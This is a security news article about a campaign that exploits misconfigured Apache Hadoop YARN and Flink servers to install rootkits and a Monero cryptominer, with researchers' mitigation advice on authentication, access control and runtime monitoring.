Attackers deploy rootkits on misconfigured Apache Hadoop and Flink servers

Researchers have discovered a new malware attack campaign that exploits misconfigurations in Apache Hadoop and Flink, two technologies for processing big data sets and data streams. The attackers behind the campaign exploit these issues without authentication to deploy rootkits on the underlying systems and then install a Monero cryptocurrency mining program.

“This attack is particularly intriguing due to the attacker’s use of packers and rootkits to conceal their malware,” researchers from Aqua Security said in a report. “The simplicity with which these techniques are employed presents a significant challenge to traditional security defenses.”

The attackers took advantage of a misconfiguration in the ResourceManager component of Hadoop YARN that allows unauthenticated users to send API requests to deploy new applications. Hadoop YARN (Yet Another Resource Negotiator) is the Hadoop component that separates resource management and application job scheduling from the data processing layer. Hadoop itself is an open-source framework that allows large data sets to be distributed and processed across clusters of computers and is a common tool for data scientists.

“The YARN permits unauthenticated users to create and run applications. This misconfiguration can be exploited by an unauthenticated, remote attacker through a specially designed HTTP request, potentially leading to the execution of arbitrary code, depending on the privileges of the user on the node where the code is executed,” the researchers said.

This issue is not new and has been exploited before by attackers to compromise Hadoop clusters, for example last years in campaigns by a group dubbed TeamTNT that specializes in attacking multiple cloud-native technologies including Kubernetes clusters, Docker APIs, Weave Scope instances, JupyterLab and Jupyter Notebook deployments, and Redis servers.

The attackers behind the new campaign observed by Aqua also targeted Apache Flink, an open-source data stream-processing and batch-processing framework through a different insecure configuration in the file upload mechanism, which can allow unauthenticated attackers to upload rogue JAR (Java Archive) files onto the server. Like in the case of Hadoop, this can lead to remote code execution on the server.

From rootkits to cryptomining

In the attack chain against Hadoop, the attackers first exploit the misconfiguration to create a new application on the cluster and allocate computing resources to it. In the application container configuration, they put a series of shell commands that use the curl command-line tool to download a binary called “dca” from an attacker-controlled server inside the /tmp directory and then execute it. A subsequent request to Hadoop YARN will execute the newly deployed application and therefore the shell commands.

Dca is a Linux-native ELF binary that serves as a malware downloader. Its primary purpose is to download and install two other rootkits and to drop another binary file called tmp on disk. It also sets a crontab job to execute a script called dca.sh to ensure persistence on the system. The tmp binary that’s bundled into dca itself is a Monero cryptocurrency mining program, while the two rootkits, called initrc.so and pthread.so, are used to hide the dca.sh script and tmp file on disk.

The IP address that was used to target Aqua’s Hadoop honeypot was also used to target Flink, Redis, and Spring framework honeypots (via CVE-2022-22965). This suggests that the Hadoop attacks are likely part of a larger operation that targets different technologies, like with TeamTNT’s operations in the past. When probed via Shodan, the IP address seemed to host a web server with a Java interface named Stage that is likely part of the Java payload implementation from the Metasploit Framework.

“To mitigate vulnerabilities in Apache Flink and Hadoop ResourceManager, specific strategies need to be implemented,” Assaf Morag, a security researcher at Aqua Security, tells CSO via email. “For Apache Flink, it’s crucial to secure the file upload mechanism. This involves restricting the file upload functionality to authenticated and authorized users and implementing checks on the types of files being uploaded to ensure they are legitimate and safe. Measures like file size limits and file type restrictions can be particularly effective.”

Meanwhile, Hadoop ResourceManager needs to have authentication and authorization configured for API access. Possible options include integration with Kerberos — a common choice for Hadoop environments — LDAP or other supported enterprise user authentication systems.

“Additionally, setting up access control lists (ACLs) or integrating with role-based access control (RBAC) systems can be effective for authorization configuration, a feature natively supported by Hadoop for various services and operations,” Morag says. It’s also recommended to consider deploying agent-based security solutions for containers that monitor the environment and can detect cryptominers, rootkits, obfuscated, or packed binaries and other suspicious runtime behaviors.

Cyberattacks, Cybercrime, Malware, Vulnerabilities